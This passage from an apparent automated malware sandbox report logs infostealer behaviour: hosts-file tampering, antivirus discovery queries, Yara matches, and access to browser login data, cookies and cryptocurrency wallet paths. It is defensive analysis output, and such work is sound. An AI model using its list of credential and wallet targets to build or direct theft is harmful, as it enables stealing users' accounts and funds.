                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Brokercrt\comReviewsession.exeQueries volume information: C:\Brokercrt\comReviewsession.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5CC330 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00007FF76D5CC330
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5E4F10 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,1_2_00007FF76D5E4F10
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_0029ACF5 GetVersionExW,2_2_0029ACF5
                        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: XClient.exe, 00000006.00000002.2837735994.000000001C2F9000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000006.00000002.2837735994.000000001C250000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000006.00000002.2837735994.000000001C2B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 00000001.00000003.1694117012.0000021AFD7E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.1694117012.0000021AFD7E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.2039099236.000001D5E543D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.2029505952.000001D5E6183000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.2035836310.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.2038832287.000001D5E5438000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2050287577.000001D5E543E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.2032955728.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Built.exe PID: 6496, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Built.exe PID: 6252, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI64962\rarreg.key, type: DROPPED
                        Source: Yara matchFile source: 00000039.00000002.2145328378.0000000002852000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000037.00000002.2144420087.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000033.00000002.2143786130.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000033.00000002.2143786130.0000000003202000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000033.00000002.2143786130.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.1871672428.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000034.00000002.2132843674.0000000002412000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000039.00000002.2145328378.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003B.00000002.2149228048.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000037.00000002.2144420087.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003B.00000002.2149228048.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000039.00000002.2145328378.0000000002848000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000034.00000002.2132843674.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.1871672428.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: comReviewsession.exe PID: 7476, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: dasHost.exe PID: 7324, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: dasHost.exe PID: 8064, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: dwm.exe PID: 8060, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: iKSiRODBDWoPAMSDKBDQBFN.exe PID: 7568, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: iKSiRODBDWoPAMSDKBDQBFN.exe PID: 7776, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Built.exe PID: 6252, type: MEMORYSTR
                        Source: Yara matchFile source: Vjy8d2EoqK.exe, type: SAMPLE
                        Source: Yara matchFile source: 4.0.S l r .exe.409294.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.S l r .exe.569e78.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.Vjy8d2EoqK.exe.e954a4.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.S l r .exe.409294.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.S l r .exe.569e78.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.XClient.exe.d70000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.Vjy8d2EoqK.exe.e8fa8c.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.Vjy8d2EoqK.exe.e8248c.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.S l r .exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.Vjy8d2EoqK.exe.adfe9c.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.Vjy8d2EoqK.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.Vjy8d2EoqK.exe.40936c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.1709553123.000000000055D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.1682604318.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.1709097022.0000000000D72000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Vjy8d2EoqK.exe PID: 2596, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: S l r .exe PID: 5768, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 7216, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\S l r .exe, type: DROPPED
                        Source: Built.exe, 00000003.00000003.1847774640.000001D5E5413000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
                        Source: Built.exe, 00000003.00000002.2054526869.000001D5E5820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: oaming\Exodus\exodus.wal0
                        Source: Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoreaty0
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
                        Source: Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoreaty0
                        Source: Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                        Source: Vjy8d2EoqK.exe, 00000000.00000003.1694720616.0000000002A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64fJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareportingJump to behavior
